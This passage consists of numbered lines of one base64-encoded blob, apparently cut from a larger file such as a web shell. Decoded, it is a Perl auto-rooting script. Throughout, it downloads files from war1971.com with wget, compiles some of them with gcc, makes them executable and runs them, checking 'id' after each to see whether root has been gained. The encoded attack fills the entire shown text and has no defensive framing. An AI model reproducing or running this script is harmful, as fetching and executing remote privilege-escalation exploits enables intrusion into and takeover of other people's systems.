  945. b2QgNzc3IGV4cGxvaXQiKTsgDQpzeXN0ZW0oIi4vZXhwbG9pdCIpOyANCnByaW50ICJJZiB1IHIg
  946. cjAwdCBzdG9wIHhwbCB3aXRoIGN0cmwrY1xuIjsNCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3
  947. MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvcnVuMiIpOyAgDQpzeXN0ZW0oImNobW9kIDc3NyBydW4y
  948. Iik7IA0Kc3lzdGVtKCIuL3J1bjIiKTsgDQpzeXN0ZW0oImlkIik7IA0Kc3lzdGVtKCJ3Z2V0IGV4
  949. cCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvZXhwIik7ICANCnN5c3RlbSgi
  950. Y2htb2QgNzc3IGV4cCIpOyANCnN5c3RlbSgiLi9leHAiKTsgDQpzeXN0ZW0oImlkIik7IA0Kc3lz
  951. dGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy9leHAxIik7ICAN
  952. CnN5c3RlbSgiY2htb2QgNzc3IGV4cDEiKTsgDQpzeXN0ZW0oIi4vZXhwMSIpOyANCnN5c3RlbSgi
  953. aWQiKTsgDQpzeXN0ZW0oIndnZXQgaHR0cDovL3dhcjE5NzEuY29tL0NNU19GSUxFUy9maWxlL2Nj
  954. L2V4cDIiKTsgIA0Kc3lzdGVtKCJjaG1vZCA3NzcgZXhwMiIpOyANCnN5c3RlbSgiLi9leHAyIik7
  955. IA0Kc3lzdGVtKCJpZCIpOyANCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJ
  956. TEVTL2ZpbGUvY2MvZXhwMyIpOyAgDQpzeXN0ZW0oImNobW9kIDc3NyBleHAzIik7IA0Kc3lzdGVt
  957. KCIuL2V4cDMiKTsgDQpzeXN0ZW0oImlkIik7IA0Kc3lzdGVtKCJ3Z2V0IGV4cDQgaHR0cDovL3dh
  958. cjE5NzEuY29tL0NNU19GSUxFUy9maWxlL2NjL2V4cDQiKTsgIA0Kc3lzdGVtKCJjaG1vZCA3Nzcg
  959. ZXhwNCIpOyANCnN5c3RlbSgiLi9leHA0Iik7IA0Kc3lzdGVtKCJpZCIpOyANCnN5c3RlbSgid2dl
  960. dCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvZXhwNSIpOyAgDQpzeXN0ZW0o
  961. ImNobW9kIDc3NyBleHA1Iik7IA0Kc3lzdGVtKCIuL2V4cDUiKTsgDQpzeXN0ZW0oImlkIik7IA0K
  962. c3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy9leHA2Iik7
  963. ICANCnN5c3RlbSgiY2htb2QgNzc3IGV4cDYiKTsgDQpzeXN0ZW0oIi4vZXhwNiIpOyANCnN5c3Rl
  964. bSgiaWQiKTsgDQpzeXN0ZW0oIndnZXQgaHR0cDovL3dhcjE5NzEuY29tL0NNU19GSUxFUy9maWxl
  965. L2NjL2V4cDciKTsgIA0Kc3lzdGVtKCJjaG1vZCA3NzcgZXhwNyIpOyANCnN5c3RlbSgiLi9leHA3
  966. Iik7IA0Kc3lzdGVtKCJpZCIpOyANCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01T
  967. X0ZJTEVTL2ZpbGUvY2MvZXhwOCIpOyAgDQpzeXN0ZW0oImNobW9kIDc3NyBleHA4Iik7IA0Kc3lz
  968. dGVtKCIuL2V4cDgiKTsgDQpzeXN0ZW0oImlkIik7IA0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIx
  969. OTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy9leHA5Iik7ICANCnN5c3RlbSgiY2htb2QgNzc3IGV4
  970. cDkiKTsgDQpzeXN0ZW0oIi4vZXhwOSIpOyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSBy
  971. IHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7DQpzeXN0ZW0oIndnZXQgaHR0cDovL3dhcjE5
  972. NzEuY29tL0NNU19GSUxFUy9maWxlL2NjL3J1bjIiKTsgIA0Kc3lzdGVtKCJjaG1vZCA3NzcgcnVu
  973. MiIpOyANCnN5c3RlbSgiLi9ydW4yIik7IA0Kc3lzdGVtKCJpZCIpOyANCnByaW50ICJJZiB1IHIg
  974. cjAwdCBzdG9wIHhwbCB3aXRoIGN0cmwrY1xuIjsNCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3
  975. MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvcnVuMiIpOyAgDQpzeXN0ZW0oImNobW9kIDc3NyBydW4y
  976. Iik7IA0Kc3lzdGVtKCIuL3J1bjIiKTsgDQpzeXN0ZW0oImlkIik7IA0KcHJpbnQgIklmIHUgciBy
  977. MDB0IHN0b3AgeHBsIHdpdGggY3RybCtjXG4iOw0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcx
  978. LmNvbS9DTVNfRklMRVMvZmlsZS9jYy9leHBsb2l0Iik7ICANCnN5c3RlbSgiY2htb2QgNzc3IGV4
  979. cGxvaXQiKTsgDQpzeXN0ZW0oIi4vZXhwbG9pdCIpOyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAi
  980. SWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7DQpzeXN0ZW0oIndnZXQgaHR0cDov
  981. L3dhcjE5NzEuY29tL0NNU19GSUxFUy9maWxlL2NjL2V4cGxvaXQyIik7ICANCnN5c3RlbSgiY2ht
  982. b2QgNzc3IGV4cGxvaXQyIik7IA0Kc3lzdGVtKCIuL2V4cGxvaXQyIik7IA0Kc3lzdGVtKCJpZCIp
  983. OyANCnByaW50ICJJZiB1IHIgcjAwdCBzdG9wIHhwbCB3aXRoIGN0cmwrY1xuIjsNCnN5c3RlbSgi
  984. d2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvZXhwbG9pdDIiKTsgIA0K
  985. c3lzdGVtKCJjaG1vZCA3NzcgZXhwbG9pdDIiKTsgDQpzeXN0ZW0oIi4vZXhwbG9pdDIiKTsgDQpz
  986. eXN0ZW0oImlkIik7IA0KcHJpbnQgIklmIHUgciByMDB0IHN0b3AgeHBsIHdpdGggY3RybCtjXG4i
  987. Ow0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy9ydW4y
  988. Iik7ICANCnN5c3RlbSgiY2htb2QgNzc3IHJ1bjIiKTsgDQpzeXN0ZW0oIi4vcnVuMiIpOyANCnN5
  989. c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7
  990. DQpzeXN0ZW0oIndnZXQgaHR0cDovL3dhcjE5NzEuY29tL0NNU19GSUxFUy9maWxlL2NjLzIwMDkt
  991. MSIpOyAgDQpzeXN0ZW0oImNobW9kIDc3NyAyMDA5LTEiKTsgDQpzeXN0ZW0oIi4vMjAwOS0xIik7
  992. IA0Kc3lzdGVtKCJpZCIpOyANCnByaW50ICJJZiB1IHIgcjAwdCBzdG9wIHhwbCB3aXRoIGN0cmwr
  993. Y1xuIjsNCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2Mv
  994. ZGVybGUuYyIpOyANCnN5c3RlbSgiZ2NjIGRlcmxlLmMgLW8gZGVybGUiKTsgIA0Kc3lzdGVtKCJj
  995. aG1vZCA3NzcgZGVybGUiKTsgDQpzeXN0ZW0oIi4vZGVybGUiKTsgDQpzeXN0ZW0oImlkIik7IA0K
  996. cHJpbnQgIklmIHUgciByMDB0IHN0b3AgeHBsIHdpdGggY3RybCtjXG4iOw0Kc3lzdGVtKCJ3Z2V0
  997. IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy8zLmMiKTsgDQpzeXN0ZW0oImdj
  998. YyAzLmMgLW8gMyIpOyAgDQpzeXN0ZW0oImNobW9kIDc3NyAzIik7IA0Kc3lzdGVtKCIuLzMiKTsg
  999. DQpzeXN0ZW0oImlkIik7IA0KcHJpbnQgIklmIHUgciByMDB0IHN0b3AgeHBsIHdpdGggY3RybCtj
  1000. XG4iOw0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy8z
  1001. YSIpOyANCnN5c3RlbSgiY2htb2QgNzc3IDNhIik7IA0Kc3lzdGVtKCIuLzNhIik7IA0Kc3lzdGVt
  1002. KCJpZCIpOyANCnByaW50ICJJZiB1IHIgcjAwdCBzdG9wIHhwbCB3aXRoIGN0cmwrY1xuIjsNCnN5
  1003. c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvNC5jIik7IA0K
  1004. c3lzdGVtKCJnY2MgNC5jIC1vIDQiKTsgIA0Kc3lzdGVtKCJjaG1vZCA3NzcgNCIpOyANCnN5c3Rl
  1005. bSgiLi80Iik7IA0Kc3lzdGVtKCJpZCIpOyANCnByaW50ICJJZiB1IHIgcjAwdCBzdG9wIHhwbCB3
  1006. aXRoIGN0cmwrY1xuIjsNCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVT
  1007. L2ZpbGUvY2MvNGEiKTsgDQpzeXN0ZW0oImNobW9kIDc3NyA0YSIpOyANCnN5c3RlbSgiLi80YSIp
  1008. OyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJs
  1009. K2NcbiI7IA0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9j
  1010. Yy9jeC5jIik7IA0Kc3lzdGVtKCJnY2MgY3guYyAtbyBjeCIpOyAgDQpzeXN0ZW0oImNobW9kIDc3
  1011. NyBjeCIpOyANCnN5c3RlbSgiLi9jeCIpOyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSBy
  1012. IHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7IA0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIx
  1013. OTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy9jeHguYyIpOyANCnN5c3RlbSgiZ2NjIGN4eC5jLSBv
  1014. IGN4eCIpOyAgDQpzeXN0ZW0oImNobW9kIDc3NyBjeHgiKTsgDQpzeXN0ZW0oIi4vY3h4Iik7IA0K
  1015. c3lzdGVtKCJpZCIpOyANCnByaW50ICJJZiB1IHIgcjAwdCBzdG9wIHhwbCB3aXRoIGN0cmwrY1xu
  1016. IjsgDQpzeXN0ZW0oIndnZXQgaHR0cDovL3dhcjE5NzEuY29tL0NNU19GSUxFUy9maWxlL2NjL2V4
  1017. cGxvaXQyIik7IA0Kc3lzdGVtKCJjaG1vZCA3NzcgZXhwbG9pdDIiKTsgDQpzeXN0ZW0oIi4vZXhw
  1018. bG9pdDIiKTsgDQpzeXN0ZW0oImlkIik7IA0KcHJpbnQgIklmIHUgciByMDB0IHN0b3AgeHBsIHdp
  1019. dGggY3RybCtjXG4iOyANCnN5c3RlbSgid2dldCBydW4gaHR0cDovL3dhcjE5NzEuY29tL0NNU19G
  1020. SUxFUy9maWxlL2NjL3J1biIpOyANCnN5c3RlbSgiY2htb2QgNzc3IHJ1biIpOyANCnN5c3RlbSgi
  1021. Li9ydW4iKTsgDQpzeXN0ZW0oImlkIik7IA0KcHJpbnQgIklmIHUgciByMDB0IHN0b3AgeHBsIHdp
  1022. dGggY3RybCtjXG4iOyANCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVT
  1023. L2ZpbGUvY2MvcnVuLnNoIik7ICANCnN5c3RlbSgiY2htb2QgNzc3IHJ1bi5zaCIpOyANCnN5c3Rl
  1024. bSgiLi9ydW4uc2giKTsgDQpzeXN0ZW0oImlkIik7IA0KcHJpbnQgIklmIHUgciByMDB0IHN0b3Ag
  1025. eHBsIHdpdGggY3RybCtjXG4iOw0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNf
  1026. RklMRVMvZmlsZS9jYy8yOS5jIik7IA0Kc3lzdGVtKCJnY2MgMjkuYyAtbyAyOSIpOyAgDQpzeXN0
  1027. ZW0oImNobW9kIDc3NyAyOSIpOyANCnN5c3RlbSgiLi8yOSIpOyANCnN5c3RlbSgiaWQiKTsgDQpw
  1028. cmludCAiSWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7DQpzeXN0ZW0oImh0dHA6
  1029. Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy8zMCIpOyAgDQpzeXN0ZW0oImNobW9kIDc3
  1030. NyAzMCIpOyANCnN5c3RlbSgiLi8zMCIpOyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSBy
  1031. IHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7DQpzeXN0ZW0oIndnZXQgaHR0cDovL3dhcjE5
  1032. NzEuY29tL0NNU19GSUxFUy9maWxlL2NjLzIwMDkiKTsgIA0Kc3lzdGVtKCJjaG1vZCA3NzcgMjAw
  1033. OSIpOyANCnN5c3RlbSgiLi8yMDA5Iik7IA0Kc3lzdGVtKCJpZCIpOyANCnByaW50ICJJZiB1IHIg
  1034. cjAwdCBzdG9wIHhwbCB3aXRoIGN0cmwrY1xuIjsNCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3
  1035. MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvaXNrb3JwaXR4Iik7ICANCnN5c3RlbSgiY2htb2QgNzc3
  1036. IGlza29ycGl0eCIpOyANCnN5c3RlbSgiLi9pc2tvcnBpdHgiKTsgDQpzeXN0ZW0oImlkIik7IA0K
  1037. cHJpbnQgIklmIHUgciByMDB0IHN0b3AgeHBsIHdpdGggY3RybCtjXG4iOw0Kc3lzdGVtKCJ3Z2V0
  1038. IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy9jIik7ICANCnN5c3RlbSgiY2ht
  1039. b2QgNzc3IGMiKTsgDQpzeXN0ZW0oIi4vYyIpOyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYg
  1040. dSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7DQpzeXN0ZW0oIndnZXQgaHR0cDovL3dh
  1041. cjE5NzEuY29tL0NNU19GSUxFUy9maWxlL2NjL2N4Iik7ICANCnN5c3RlbSgiY2htb2QgNzc3IGN4
  1042. Iik7IA0Kc3lzdGVtKCIuL2N4Iik7IA0Kc3lzdGVtKCJpZCIpOyANCnByaW50ICJJZiB1IHIgcjAw
  1043. dCBzdG9wIHhwbCB3aXRoIGN0cmwrY1xuIjsNCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5j
  1044. b20vQ01TX0ZJTEVTL2ZpbGUvY2MvZGVybGUyIik7ICANCnN5c3RlbSgiY2htb2QgNzc3IGRlcmxl
  1045. MiIpOyANCnN5c3RlbSgiLi9kZXJsZTIiKTsgDQpzeXN0ZW0oImlkIik7IA0KcHJpbnQgIklmIHUg
  1046. ciByMDB0IHN0b3AgeHBsIHdpdGggY3RybCtjXG4iOw0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIx
  1047. OTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy9kZXJsZSIpOyAgDQpzeXN0ZW0oImNobW9kIDc3NyBk
  1048. ZXJsZSIpOyANCnN5c3RlbSgiLi9kZXJsZSIpOyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYg
  1049. dSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7DQpzeXN0ZW0oIndnZXQgaHR0cDovL3dh
  1050. cjE5NzEuY29tL0NNU19GSUxFUy9maWxlL2NjLzZ4LmMiKTsgIA0Kc3lzdGVtKCJnY2MgNnguYyAt
  1051. byA2eGEiKTsgDQpzeXN0ZW0oIi4vNnhhIik7IA0Kc3lzdGVtKCJpZCIpOyANCnByaW50ICJJZiB1
  1052. IHIgcjAwdCBzdG9wIHhwbCB3aXRoIGN0cmwrY1xuIjsNCnN5c3RlbSgid2dldCBodHRwOi8vd2Fy
  1053. MTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvNngiKTsgIA0Kc3lzdGVtKCJjaG1vZCA3NzcgNngi
  1054. KTsgDQpzeXN0ZW0oIi4vNngiKTsgDQpzeXN0ZW0oImlkIik7IA0KcHJpbnQgIklmIHUgciByMDB0
  1055. IHN0b3AgeHBsIHdpdGggY3RybCtjXG4iOw0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNv
  1056. bS9DTVNfRklMRVMvZmlsZS9jYy82YiIpOyAgDQpzeXN0ZW0oImNobW9kIDc3NyA2YiIpOyANCnN5
  1057. c3RlbSgiLi82YiIpOyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSByIHIwMHQgc3RvcCB4
  1058. cGwgd2l0aCBjdHJsK2NcbiI7DQpzeXN0ZW0oIndnZXQgaHR0cDovL3dhcjE5NzEuY29tL0NNU19G
  1059. SUxFUy9maWxlL2NjLzZ4eCIpOyAgDQpzeXN0ZW0oImNobW9kIDc3NyA2eHgiKTsgDQpzeXN0ZW0o
  1060. Ii4vNnh4Iik7IA0Kc3lzdGVtKCJpZCIpOyANCnByaW50ICJJZiB1IHIgcjAwdCBzdG9wIHhwbCB3
  1061. aXRoIGN0cmwrY1xuIjsNCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVT
  1062. L2ZpbGUvY2MvMjc3MDQiKTsgIA0Kc3lzdGVtKCJjaG1vZCA3NzcgMjc3MDQiKTsgDQpzeXN0ZW0o
  1063. Ii4vMjc3MDQiKTsgDQpzeXN0ZW0oImlkIik7IA0KcHJpbnQgIklmIHUgciByMDB0IHN0b3AgeHBs
  1064. IHdpdGggY3RybCtjXG4iOw0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklM
  1065. RVMvZmlsZS9jYy9kZXJsZTIuYyIpOyANCnN5c3RlbSgiZ2NjIGRlcmxlMi5jIC1vIGRlcmxlMiIp
  1066. OyAgDQpzeXN0ZW0oImNobW9kIDc3NyBkZXJsZTIiKTsgDQpzeXN0ZW0oIi4vZGVybGUyIik7IA0K
  1067. c3lzdGVtKCJpZCIpOyANCnByaW50ICJJZiB1IHIgcjAwdCBzdG9wIHhwbCB3aXRoIGN0cmwrY1xu
  1068. IjsNCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvZGVy
  1069. bGUyIik7IA0Kc3lzdGVtKCJjaG1vZCA3NzcgZGVybGUyIik7IA0Kc3lzdGVtKCIuL2RlcmxlMiIp
  1070. OyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJs
  1071. K2NcbiI7IA0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9j
  1072. Yy8yOC5jIik7IA0Kc3lzdGVtKCJnY2MgMjguYyAtbyAyOCIpOyANCnN5c3RlbSgiY2htb2QgNzc3
  1073. IDI4Iik7IA0Kc3lzdGVtKCIuLzI4Iik7IA0Kc3lzdGVtKCJpZCIpOyANCnN5c3RlbSgiLi8yOCIp
  1074. OyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJs
  1075. K2NcbiI7IA0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9j
  1076. Yy8yNy5jIik7IA0Kc3lzdGVtKCJnY2MgMjcuYyAtbyAyNyIpOyANCnN5c3RlbSgiY2htb2QgNzc3
  1077. IDI3Iik7IA0Kc3lzdGVtKCIuLzI3Iik7IA0Kc3lzdGVtKCJpZCIpOyANCnN5c3RlbSgiLi8yNyIp
  1078. OyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJs
  1079. K2NcbiI7IA0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9j
  1080. Yy9jLmMiKTsgDQpzeXN0ZW0oImdjYyBjLmMgLW8gYyIpOyANCnN5c3RlbSgiY2htb2QgNzc3IGMi
  1081. KTsgDQpzeXN0ZW0oIi4vYyIpOyANCnN5c3RlbSgiaWQiKTsgDQpzeXN0ZW0oIi4vYyIpOyANCnN5
  1082. c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7
  1083. IA0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy9jMi5j
  1084. Iik7IA0Kc3lzdGVtKCJnY2MgYzIuYyAtbyBjMiIpOyANCnN5c3RlbSgiY2htb2QgNzc3IGMyIik7
  1085. IA0Kc3lzdGVtKCIuL2MyIik7IA0Kc3lzdGVtKCJpZCIpOyANCnN5c3RlbSgiLi9jMiIpOyANCnN5
  1086. c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7
  1087. IA0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy8wNSIp
  1088. OyANCnN5c3RlbSgiY2htb2QgNzc3IDA1Iik7IA0Kc3lzdGVtKCIuLzA1Iik7IA0Kc3lzdGVtKCJp
  1089. ZCIpOyANCnByaW50ICJJZiB1IHIgcjAwdCBzdG9wIHhwbCB3aXRoIGN0cmwrY1xuIjsgDQpzeXN0
  1090. ZW0oIndnZXQgaHR0cDovL3dhcjE5NzEuY29tL0NNU19GSUxFUy9maWxlL2NjL2lza28iKTsgDQpz
  1091. eXN0ZW0oImNobW9kIDc3NyBpc2tvIik7IA0Kc3lzdGVtKCIuL2lza28iKTsgDQpzeXN0ZW0oImlk
  1092. Iik7DQpzeXN0ZW0oIi4vaXNrbyIpOyANCnN5c3RlbSgiaXNrbyIpOw0KcHJpbnQgIklmIHUgciBy
  1093. MDB0IHN0b3AgeHBsIHdpdGggY3RybCtjXG4iOyANCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3
  1094. MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvMTgiKTsgDQpzeXN0ZW0oImNobW9kIDc3NyAxOCIpOyAN
  1095. CnN5c3RlbSgiLi8xOCIpOyANCnN5c3RlbSgiaWQiKTsgDQpzeXN0ZW0oIi4vMTgiKTsgDQpzeXN0
  1096. ZW0oImlkIik7IA0KcHJpbnQgIklmIHUgciByMDB0IHN0b3AgeHBsIHdpdGggY3RybCtjXG4iOyAN
  1097. CnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvNyIpOyAN
  1098. CnN5c3RlbSgiY2htb2QgNzc3IDciKTsgDQpzeXN0ZW0oIi4vNyIpOyANCnN5c3RlbSgiaWQiKTsg
  1099. DQpzeXN0ZW0oIi4vNyIpOyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSByIHIwMHQgc3Rv
  1100. cCB4cGwgd2l0aCBjdHJsK2NcbiI7IA0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9D
  1101. TVNfRklMRVMvZmlsZS9jYy83LTIiKTsgDQpzeXN0ZW0oImNobW9kIDc3NyA3LTIiKTsgDQpzeXN0
  1102. ZW0oIi4vNy0yIik7IA0Kc3lzdGVtKCJpZCIpOyANCnN5c3RlbSgiLi83LTIiKTsgDQpzeXN0ZW0o
  1103. ImlkIik7IA0KcHJpbnQgIklmIHUgciByMDB0IHN0b3AgeHBsIHdpdGggY3RybCtjXG4iOyANCnN5
  1104. c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvOCIpOyANCnN5
  1105. c3RlbSgiY2htb2QgNzc3IDgiKTsgDQpzeXN0ZW0oIi4vOCIpOyANCnN5c3RlbSgiaWQiKTsgDQpz
  1106. eXN0ZW0oIi4vOCIpOyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSByIHIwMHQgc3RvcCB4
  1107. cGwgd2l0aCBjdHJsK2NcbiI7IA0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNf
  1108. RklMRVMvZmlsZS9jYy84YSIpOyANCnN5c3RlbSgiY2htb2QgNzc3IDhhIik7IA0Kc3lzdGVtKCIu
  1109. LzhhIik7IA0Kc3lzdGVtKCJpZCIpOyANCnN5c3RlbSgiLi84YSIpOyANCnN5c3RlbSgiaWQiKTsg
  1110. DQpwcmludCAiSWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7IA0Kc3lzdGVtKCJ3
  1111. Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy84YmIiKTsgDQpzeXN0ZW0o
  1112. ImNobW9kIDc3NyA4YmIiKTsgDQpzeXN0ZW0oIi4vOGJiIik7IA0Kc3lzdGVtKCJpZCIpOyANCnBy
  1113. aW50ICJJZiB1IHIgcjAwdCBzdG9wIHhwbCB3aXRoIGN0cmwrY1xuIjsgDQpzeXN0ZW0oIndnZXQg
  1114. aHR0cDovL3dhcjE5NzEuY29tL0NNU19GSUxFUy9maWxlL2NjLzhjYyIpOyANCnN5c3RlbSgiY2ht
  1115. b2QgNzc3IDhjYyIpOyANCnN5c3RlbSgiLi84Y2MiKTsgDQpzeXN0ZW0oImlkIik7IA0KcHJpbnQg
  1116. IklmIHUgciByMDB0IHN0b3AgeHBsIHdpdGggY3RybCtjXG4iOyANCnN5c3RlbSgid2dldCBodHRw
  1117. Oi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvOHgiKTsgDQpzeXN0ZW0oImNobW9kIDc3
  1118. NyA4eCIpOyANCnN5c3RlbSgiLi84eCIpOyANCnN5c3RlbSgiaWQiKTsgDQpzeXN0ZW0oIi4vOHgi
  1119. KTsgDQpzeXN0ZW0oImlkIik7IA0KcHJpbnQgIklmIHUgciByMDB0IHN0b3AgeHBsIHdpdGggY3Ry
  1120. bCtjXG4iOyANCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUv
  1121. Y2MvOSIpOyANCnN5c3RlbSgiY2htb2QgNzc3IDkiKTsgDQpzeXN0ZW0oIi4vOSIpOyANCnN5c3Rl
  1122. bSgiaWQiKTsgDQpzeXN0ZW0oIi4vOSIpOyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSBy
  1123. IHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7IA0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIx
  1124. OTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy9rcmFkMiIpOyANCnN5c3RlbSgiY2htb2QgNzc3IGty
  1125. YWQyIik7IA0Kc3lzdGVtKCIuL2tyYWQyIik7IA0Kc3lzdGVtKCJpZCIpOyANCnN5c3RlbSgiLi9r
  1126. cmFkMiAtdCAxIC1wIDIiKTsgDQpzeXN0ZW0oImlkIik7IA0Kc3lzdGVtKCIuL2tyYWQyIC10IDEg
  1127. LXAgMyIpOyANCnN5c3RlbSgiaWQiKTsgDQpzeXN0ZW0oIi4va3JhZDIgLXQgMSAtcCA0Iik7IA0K
  1128. c3lzdGVtKCJpZCIpOyANCnN5c3RlbSgiLi9rcmFkMiAtdCAxIC1wIDUiKTsgDQpzeXN0ZW0oImlk
  1129. Iik7IA0Kc3lzdGVtKCIuL2tyYWQyIC10IDEgLXAgNiIpOyANCnN5c3RlbSgiaWQiKTsgDQpzeXN0
  1130. ZW0oIi4va3JhZDIgLXQgMSAtcCA3Iik7IA0Kc3lzdGVtKCJpZCIpOyANCnN5c3RlbSgiLi9rcmFk
  1131. MiAtdCAxIC1wIDgiKTsgDQpzeXN0ZW0oImlkIik7IA0KcHJpbnQgIklmIHUgciByMDB0IHN0b3Ag
  1132. eHBsIHdpdGggY3RybCtjXG4iOyANCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01T
  1133. X0ZJTEVTL2ZpbGUvY2Mva3JhZCIpOyANCnN5c3RlbSgiY2htb2QgNzc3IGtyYWQiKTsgDQpzeXN0
  1134. ZW0oIi4va3JhZCIpOyANCnN5c3RlbSgiaWQiKTsgDQpzeXN0ZW0oIi4va3JhZCAtdCAxIC1wIDIi
